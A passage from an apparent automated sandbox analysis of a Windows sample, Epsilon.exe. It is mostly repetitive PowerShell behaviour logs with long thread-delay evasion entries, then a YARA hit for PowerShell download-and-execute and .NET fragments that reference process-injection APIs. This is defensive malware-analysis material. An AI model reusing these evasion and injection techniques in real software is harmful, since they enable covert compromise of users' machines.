        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1960Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 695Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3167Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6631Jump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2468
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep count: 3167 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 6631 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -19369081277395017s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF73782204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF73782204C
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF7378264E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF7378264E4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF7378230EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7378230EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737828790 SetUnhandledExceptionFilter,0_2_00007FF737828790
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737828494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF737828494

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: amsi64_7660.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7504, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTR
        .NET source code references suspicious native API functions
        Source: 7.2.powershell.exe.1a1da5d0000.0.raw.unpack, Progrgdfam3.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
        Source: 7.2.powershell.exe.1a1da5d0000.0.raw.unpack, Progrgdfam3.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
        Source: 7.2.powershell.exe.1a1da5d0000.0.raw.unpack, Progrgdfam3.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
        Source: 7.2.powershell.exe.1a1da5d0000.0.raw.unpack, Progrgdfam3.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
